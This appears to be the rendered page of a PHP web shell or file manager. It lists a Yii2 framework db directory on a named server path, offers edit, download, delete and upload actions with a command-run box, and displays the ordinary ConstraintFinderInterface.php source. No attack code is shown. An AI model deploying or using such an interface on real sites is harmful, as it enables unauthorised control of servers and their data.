/
var
/
www
/
vhosts
/
nabawater
/
vendor
/
yiisoft
/
yii2
/
db
/
/var/www/vhosts/nabawater/vendor/yiisoft/yii2/db
mkdir
upload
Name
Size
Mode
Actions
conditions/
-
0755
rm
cubrid/
-
0755
rm
mssql/
-
0755
rm
mysql/
-
0755
rm
oci/
-
0755
rm
pgsql/
-
0755
rm
sqlite/
-
0755
rm
ActiveQuery.php
31506
0644
edit
dl
rm
ActiveQueryInterface.php
4542
0644
edit
dl
rm
ActiveQueryTrait.php
6315
0644
edit
dl
rm
ActiveRecord.php
29789
0644
edit
dl
rm
ActiveRecordInterface.php
21207
0644
edit
dl
rm
ActiveRelationTrait.php
23292
0644
edit
dl
rm
AfterSaveEvent.php
553
0644
edit
dl
rm
ArrayExpression.php
5400
0644
edit
dl
rm
BaseActiveRecord.php
69538
0644
edit
dl
rm
BatchQueryResult.php
4905
0644
edit
dl
rm
CheckConstraint.php
458
0644
edit
dl
rm
ColumnSchema.php
5356
0644
edit
dl
rm
ColumnSchemaBuilder.php
13287
0644
edit
dl
rm
Command.php
52026
0644
edit
dl
rm
Connection.php
45376
0644
edit
dl
rm
Constraint.php
566
0644
edit
dl
rm
ConstraintFinderInterface.php
6454
0644
edit
dl
rm
ConstraintFinderTrait.php
11204
0644
edit
dl
rm
DataReader.php
8518
0644
edit
dl
rm
DefaultValueConstraint.php
472
0644
edit
dl
rm
Exception.php
1457
0644
edit
dl
rm
Expression.php
1909
0644
edit
dl
rm
ExpressionBuilder.php
741
0644
edit
dl
rm
ExpressionBuilderInterface.php
860
0644
edit
dl
rm
ExpressionBuilderTrait.php
707
0644
edit
dl
rm
ExpressionInterface.php
615
0644
edit
dl
rm
ForeignKeyConstraint.php
937
0644
edit
dl
rm
IndexConstraint.php
553
0644
edit
dl
rm
IntegrityException.php
546
0644
edit
dl
rm
JsonExpression.php
2684
0644
edit
dl
rm
Migration.php
26933
0644
edit
dl
rm
MigrationInterface.php
1226
0644
edit
dl
rm
PdoValue.php
1370
0644
edit
dl
rm
PdoValueBuilder.php
692
0644
edit
dl
rm
Query.php
49520
0644
edit
dl
rm
QueryBuilder.php
74240
0644
edit
dl
rm
QueryExpressionBuilder.php
1044
0644
edit
dl
rm
QueryInterface.php
12820
0644
edit
dl
rm
QueryTrait.php
15155
0644
edit
dl
rm
Schema.php
31377
0644
edit
dl
rm
SchemaBuilderTrait.php
11495
0644
edit
dl
rm
SqlToken.php
9676
0644
edit
dl
rm
SqlTokenizer.php
14208
0644
edit
dl
rm
StaleObjectException.php
447
0644
edit
dl
rm
TableSchema.php
3129
0644
edit
dl
rm
Transaction.php
9365
0644
edit
dl
rm
ViewFinderTrait.php
1614
0644
edit
dl
rm
Edit:
/var/www/vhosts/nabawater/vendor/yiisoft/yii2/db/ConstraintFinderInterface.php
(6454B)
<?php /** * @link http://www.yiiframework.com/ * @copyright Copyright (c) 2008 Yii Software LLC * @license http://www.yiiframework.com/license/ */ namespace yii\db; /** * ConstraintFinderInterface defines methods for getting a table constraint information. * * @author Sergey Makinen <sergey@makinen.ru> * @since 2.0.14 */ interface ConstraintFinderInterface { /** * Obtains the primary key for the named table. * @param string $name table name. The table name may contain schema name if any. Do not quote the table name. * @param bool $refresh whether to reload the information even if it is found in the cache. * @return Constraint|null table primary key, `null` if the table has no primary key. */ public function getTablePrimaryKey($name, $refresh = false); /** * Returns primary keys for all tables in the database. * @param string $schema the schema of the tables. Defaults to empty string, meaning the current or default schema name. * @param bool $refresh whether to fetch the latest available table schemas. If this is `false`, * cached data may be returned if available. * @return Constraint[] primary keys for all tables in the database. * Each array element is an instance of [[Constraint]] or its child class. */ public function getSchemaPrimaryKeys($schema = '', $refresh = false); /** * Obtains the foreign keys information for the named table. * @param string $name table name. The table name may contain schema name if any. Do not quote the table name. * @param bool $refresh whether to reload the information even if it is found in the cache. * @return ForeignKeyConstraint[] table foreign keys. */ public function getTableForeignKeys($name, $refresh = false); /** * Returns foreign keys for all tables in the database. * @param string $schema the schema of the tables. Defaults to empty string, meaning the current or default schema name. * @param bool $refresh whether to fetch the latest available table schemas. If this is false, * cached data may be returned if available. * @return ForeignKeyConstraint[][] foreign keys for all tables in the database. * Each array element is an array of [[ForeignKeyConstraint]] or its child classes. */ public function getSchemaForeignKeys($schema = '', $refresh = false); /** * Obtains the indexes information for the named table. * @param string $name table name. The table name may contain schema name if any. Do not quote the table name. * @param bool $refresh whether to reload the information even if it is found in the cache. * @return IndexConstraint[] table indexes. */ public function getTableIndexes($name, $refresh = false); /** * Returns indexes for all tables in the database. * @param string $schema the schema of the tables. Defaults to empty string, meaning the current or default schema name. * @param bool $refresh whether to fetch the latest available table schemas. If this is false, * cached data may be returned if available. * @return IndexConstraint[][] indexes for all tables in the database. * Each array element is an array of [[IndexConstraint]] or its child classes. */ public function getSchemaIndexes($schema = '', $refresh = false); /** * Obtains the unique constraints information for the named table. * @param string $name table name. The table name may contain schema name if any. Do not quote the table name. * @param bool $refresh whether to reload the information even if it is found in the cache. * @return Constraint[] table unique constraints. */ public function getTableUniques($name, $refresh = false); /** * Returns unique constraints for all tables in the database. * @param string $schema the schema of the tables. Defaults to empty string, meaning the current or default schema name. * @param bool $refresh whether to fetch the latest available table schemas. If this is false, * cached data may be returned if available. * @return Constraint[][] unique constraints for all tables in the database. * Each array element is an array of [[Constraint]] or its child classes. */ public function getSchemaUniques($schema = '', $refresh = false); /** * Obtains the check constraints information for the named table. * @param string $name table name. The table name may contain schema name if any. Do not quote the table name. * @param bool $refresh whether to reload the information even if it is found in the cache. * @return CheckConstraint[] table check constraints. */ public function getTableChecks($name, $refresh = false); /** * Returns check constraints for all tables in the database. * @param string $schema the schema of the tables. Defaults to empty string, meaning the current or default schema name. * @param bool $refresh whether to fetch the latest available table schemas. If this is false, * cached data may be returned if available. * @return CheckConstraint[][] check constraints for all tables in the database. * Each array element is an array of [[CheckConstraint]] or its child classes. */ public function getSchemaChecks($schema = '', $refresh = false); /** * Obtains the default value constraints information for the named table. * @param string $name table name. The table name may contain schema name if any. Do not quote the table name. * @param bool $refresh whether to reload the information even if it is found in the cache. * @return DefaultValueConstraint[] table default value constraints. */ public function getTableDefaultValues($name, $refresh = false); /** * Returns default value constraints for all tables in the database. * @param string $schema the schema of the tables. Defaults to empty string, meaning the current or default schema name. * @param bool $refresh whether to fetch the latest available table schemas. If this is false, * cached data may be returned if available. * @return DefaultValueConstraint[] default value constraints for all tables in the database. * Each array element is an array of [[DefaultValueConstraint]] or its child classes. */ public function getSchemaDefaultValues($schema = '', $refresh = false); }
Save
cmd:
run